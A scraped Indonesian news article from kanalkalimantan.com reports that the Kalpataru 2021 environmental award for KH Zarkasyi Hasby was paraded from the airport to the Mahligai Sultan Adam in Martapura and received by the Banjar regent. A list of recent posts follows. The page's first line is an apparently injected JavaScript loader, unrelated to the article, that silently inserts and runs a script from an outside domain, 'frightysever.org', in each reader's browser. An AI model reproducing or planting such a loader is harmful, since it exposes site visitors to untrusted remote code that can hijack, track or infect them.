(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Tiba di Martapura Anugerah Kalpataru 2021 Diarak Menuju Mahligai Sultan Adam


KANALKALIMANTAN.COM, MARTAPURA,- Setelah diserahkan oleh Menteri Lingkungan Hidup dan Kehutanan (LHK) RI Siti Nurbaya Bakar Kamis kemarin, Jumat (15/10/2021) siang, anugerah Kalpataru 2021 untuk KH Zarkasyi Hasby Lc tiba di Martapura.

Kedatangan anugerah tersebut diwarnai  iring-iringan 12 mobil dari Bandara Internasional Syamsudin Noor Banjarbaru menuju Mahligai Sultan Adam Martapura.

Setibanya di Mahligai Sultan Adam rombongan KH Zarkasyi didampingi mantan Menteri LH Muhammad Hatta dan Kadis LH Provinsi Kalimantan Selatan Hanifah Dwi Nirwana di sambut hangat oleh Bupati Banjar H Saidi Mansyur beserta jajaran.

Pejuang lingkungan KH Zarkasyi Hasby langsung menyerahkan trofi penghargaan paling bergengsi di bidang lingkungan tersebut kepada H Saidi Mansyur, sebagai tanda laporan bahwa penghargaan tersebut berhasil diraih.

Baca juga : Meresahkan, Polisi Lakukan Sejumlah Penggerebekan Pinjaman Online yang Teror Korban!

Bupati Banjar, H Saidi Mansyur, mengucapkan selamat kepada KH Zarkasyi Hasbi atas prestasi yang telah diraih, atas dedikasinya selama ini yang dinilai berjasa telah merintis, mengabdi dan menyelamatkan lingkungan.

“Atas nama pemerintah daerah kami ucapkan selamat kepada KH Zarkasyi Hasbi yang mendapatkan penghargaan kalpataru 2021 katagori Pembina Lingkungan dari Menteri LHK,” ujar bupati.

Menurut Saidi, selama ini kerjasama yang baik telah diberikan oleh pihak Pondok Pesantren Darul Hijrah Cindai Alus dengan Pemerintah Kabupaten Banjar. Saidi berharap ini bisa dijadikan motivasi bagi pondok pesantren lainnya di Kabupaten Banjar.

Ramah tamah dengan Bupati Banjar itu berlangsung sekitar 50 menit kemudian rombongan bertolak ke Ponpes Cindai Alus guna mengikuti rangkaian Kegiatan lainnya.

Sementara penghargaan Kalpataru 2021 tersebut di inapkan satu malam di Mahligai Sultan Adam Martapura. Rencananya piala penghargaan tersebut kembali di arak oleh pasukan pengibar bendera (Paskibra) Kabupaten Banjar pada keesokan harinya menuju ponpes segudang prestasi tersebut. (kanalkalimantan.com/rls)

Reporter : Rls
Editor : Dhani


Desy Arfianty

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

11 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

13 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

14 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

16 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

18 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

19 jam ago

This website uses cookies.